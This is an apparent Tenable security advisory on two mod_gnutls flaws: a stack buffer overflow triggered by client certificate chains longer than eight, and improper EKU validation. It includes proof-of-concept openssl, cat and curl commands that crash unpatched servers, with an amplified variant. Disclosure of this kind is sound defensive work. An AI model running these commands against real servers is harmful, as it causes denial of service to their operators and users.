Synopsis
Multiple vulnerabilities exist in mod_gnutls.
CVE-2026-33307 Stack-based Buffer Overflow in Client Certificate Chain Processing
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (7.5)
A client certificate chain with more than 8 certificates can cause a stack-based buffer overflow. The certificate chain does not need to lead to a trusted root, or even be a well-formed chain - the same certificate can be used multiple times.
Proof of Concept:
The following steps demonstrate the vulnerability on a Fedora 42 system running mod_gnutls 0.12.0.
1. The attacker generates a self-signed certificate:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 365 -noenc -subj "/CN=self-signed-cert"
Please note there are no particular requirements for the contents of this certificate.
2. The attacker generates a malicious certificate chain by using 9 copies of the same certificate generated above:
cat cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem > malicious-cert-chain.pem
3. The attacker initiates an mTLS connection using the crafted certificate chain:
curl https://<hostname> -k --key key.pem --cert malicious-cert-chain.pem
4. The following entry can be found in the /var/log/httpd/error_log file on the server:
*** stack smashing detected ***: terminated
[...] [core:notice] [pid 1183:tid 1183] AH00051: child pid 3449 exit signal Abort (6), possible coredump in /etc/httpd
The above confirms that the stack-based buffer overflow was detected and the protections kicked in: the process was aborted, and a core dump was generated. This largely reduces this vulnerability to a transient DoS, thanks to the hardening.
This attack can be easily amplified by the attacker by making a number of requests:
curl https://<hostname> https://<hostname> https://<hostname> https://<hostname> -k --key key.pem --cert malicious-cert-chain.pem
This vulnerability can lead to a potential DoS through attacker-controlled CPU, memory and disk usage, despite the protections in place.
CVE-2026-33308 Improper Certificate Validation
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N (6.8)
A client certificate with incorrect Extended Key Usage (EKU) is accepted. If the attackers compromise a certificate (with the associated private key) issued for a different purpose (e.g. server authentication), they may be able to reuse it for mTLS client authentication.
Proof of Concept:
The attacker makes a HTTPS request using a separately acquired private key and certificate chain:
curl https://<hostname> -k --key key.pem --cert not-client-cert-chain.pem
Solution
CVE-2026-33307: Upgrade to version 0.12.3 / 0.13.0, or later.
CVE-2026-33308: Upgrade to version 0.13.0, or later.
Additional References
https://github.com/airtower-luna/mod_gnutls/security/advisories/GHSA-gjpm-55p4-c76rhttps://github.com/airtower-luna/mod_gnutls/security/advisories/GHSA-hm2g-m958-8qgh
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]